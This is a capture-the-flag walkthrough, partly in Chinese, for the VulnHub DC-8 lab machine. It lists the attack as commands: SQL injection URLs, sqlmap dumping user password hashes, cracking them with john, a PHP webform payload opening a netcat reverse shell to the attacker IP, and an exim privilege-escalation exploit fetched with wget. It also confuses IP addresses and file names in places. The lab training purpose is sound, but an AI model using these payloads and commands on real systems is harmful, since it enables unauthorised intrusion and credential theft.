Vulnhub target drone download:
Target drone download
Official website address: https://download.vulnhub.com/dc/DC-8.zip
After downloading the target machine file, you can import it and use it. The target machine has only one flag value .
DC6 target machine IP address : 192.168.18.128
kali attack machine IP address :192.168.18.102
① Confidence collection
#扫描存活主机
arp-scan -l
#nmap扫描开放端口信息
nmap -A -p- 192.168.18.102
Open port 22
, 80
we perform website login
observation URL, there may beSQL注入
#查询到数据库名字: d7db
http://192.168.18.102/?nid=-1 union select database() --+
#查询数据库版本:10.1.26-MariaDB-0+deb9u1
http://192.168.18.102/?nid=-1 union select version() --+
Manual injection reference link DC8 Manual injection of SQL at the shooting range
directory scan
dirsearch --url http://192.168.18.102
User login address http://192.168.18.102/user/login
data explosion
sqlmap -u http://192.168.18.102/?nid=1 --dbs
sqlmap -u http://192.168.18.102/?nid=1 -D d7db
sqlmap -u http://192.168.18.102/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.18.102/?nid=1 -D d7db -T users -C name,pass --dump
cat pass
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
②Password blasting
john pass
Username john
and password turtle
to log in
③Rebound shell
Click- Content
>Click- edit
>Click- WEBFORMS
>Click- Form settings
>Click the drop-down box to selectPHP code
Thanks for taking the time to contact us. We shall be in contact soon.
<?php system("nc -e /bin/bash 192.168.18.128 1234"); ?>
kali攻击机进行监听1234端口
nc -nlvp 1234
#浏览器中点击任意`Submit`按钮即可实现连接
④User privilege escalation
#连接shell
python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
Search for related vulnerabilities searchsploit exim
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 666.sh
cat 666.sh
cp 666.sh /var/www/html
vi 666.sh
#在最后一行插入set ff=unix,进行保存
transmission
#kali机上
service apache2 start
#连接的dc8
cd /tmp
wget http://192.168.18.128/66.sh
chmod 777 666.sh #给权限
ls -l
./666.sh -m netcat
⑤Get flag
cd /root
cat flag.txt